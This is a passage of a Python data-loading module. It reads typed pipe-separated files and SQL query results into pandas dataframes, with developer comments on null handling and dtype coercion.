# # it is coming in as null/empty (e.g. the last record in the following set:)
# # LE::text|PERIOD::text|RC::text|MGCOA::text|VT::text|TP::text|FRB::text|FUNCTION::text|DCOV::numeric|LOCAL_CURRENCY::text|CURRENCY_RATE::numeric|DCOV_LC::numeric
# # LE_0585|2018_01|6019999|6120_NA|VT_0585|TP_NA|FRB_AP74358|OM|0.00031|EUR|0.8198|0.000254138
# # LE_0003|2018_07|CA10991|5380_EBITX|VT_9988|TP_NA|FRB_APKRA15|OM|-0.00115|INR|68.7297|-0.079039155
# # LE_2380|2017_08|AP92099|Q_5010_EBITX|VT_0585|TP_NA|FRB_AP92099|RE|99|||
'#N/A',
'#N/A N/A',
'#NA',
'-1.#IND',
'-1.#QNAN',
'-NaN',
'-nan',
'1.#IND',
'1.#QNAN',
'N/A',
'NA',
'NULL',
'NaN',
'n/a',
'nan',
'null'
]
parse_dates = []
if dtypes is not None:
for k, v in six.iteritems(dtypes):
dtypes[k] = v.lower()
#Handle inbound dates
#https://stackoverflow.com/questions/21269399/datetime-dtypes-in-pandas-read-csv
if 'datetime' in dtypes[k]:
dtypes[k] = 'object'
parse_dates.append(k)
try:
df = pd.read_csv(buf, header=None, names=column_names, dtype=dtypes, sep=sep, na_values=na_values, keep_default_na=False, parse_dates=parse_dates, encoding='utf-8')
except ValueError:
#remove dtypes if we have converters instead:
for k in six.iterkeys(converters):
if k in list(dtypes.keys()):
dtypes.pop(k, None)
na_values.append('')
buf = open(infile, 'rb')
headerIO = six.BytesIO(buf.readline()) # The first line needs to be in a separate iterator, so that we don't mix read and iter.
header = next(csv.reader(headerIO, delimiter=sep)) # Just parse that first line as a csv row
df = pd.read_csv(buf, header=None, names=column_names, dtype=dtypes, sep=sep, na_values=na_values, keep_default_na=False, parse_dates=parse_dates, converters=converters, encoding='utf-8')
finally:
# A final note:
# SURELY there's a more efficient and native pandas way of doing this, but I'll be damned if I could figure it out.
# Pandas used to have an error='coerce' method to force data type. It's no longer an option, it seems.
# Forcing data type is NOT easy, when incoming text data is sequential delimiters with no values or whitespace.
# What we're doing now is still not without risk. There are use cases for setting empty to zero, which is what we're doing, and use cases to set
# empty to null, which is probably what we SHOULD do, but for now, we do it this way because we already have a battle hardened dh.cast_as_float that
# works this way. We should probably just call a different homegrown float that returns a NaN or None (None being preferred) rather than 0.0 on exception.
# Mercy. This has been a pain.
# I guess if it was easy, Pandas wouldn't support the ability to send in your own converters.
pass
return df
finally:
if isinstance(infile, six.string_types):
buf.close()
#Otherwise leave it open, since this function didn't open it.
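# A minimal, self-contained usage sketch for load_typed_psv. Each header cell
# carries the SQL type joined by CSV_TYPE_DELIMITER (the 'name::type'
# convention shown in the na_values comment above); the sample data and the
# Python-2-era bytes handling follow this module's own conventions.
import io

sample = io.BytesIO(
    b'LE::text|PERIOD::text|DCOV::numeric\n'
    b'LE_0001|2018_01|0.00031\n'
    b'LE_0002|2018_02|0.00042\n'
)
df = load_typed_psv(sample)
print(df.dtypes)  # LE and PERIOD load as object, DCOV as a float column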
def table_result_to_df(result):
"""Converts a SQL result to a pandas dataframe
Args:
result (dict): The result of a database query
Returns:
`pandas.DataFrame`: A dataframe representation of `result`
"""
meta = result['meta']
data = result['data']
columns = [m['id'] for m in meta]
dtypes = {
m['id']: dtype_from_sql(m['dtype'].lower())
for m in meta
}
df = pd.DataFrame.from_records(data, columns=columns)
try:
typed_df = df.astype(dtype=dtypes)
except:
"""
This is heavy-handed, but it had to be.
Something was tripping up the standard behavior, presumably relating to
handling of nulls in floats. We're forcing them to 0.0 for now, which is possibly
sketchy, depending on the use case, but usually preferred behavior.
Buyer beware.
"""
typed_df = df
for col in typed_df.columns:
if dtypes[col] == u'object':
typed_df[col] = list(map(dh.cast_as_str, typed_df[col]))
elif dtypes[col].startswith(u'float'):
typed_df[col] = list(map(dh.cast_as_float, typed_df[col]))
elif dtypes[col].startswith(u'int'): #detect any flavor of int and cast it as int.
typed_df[col] = list(map(dh.cast_as_int,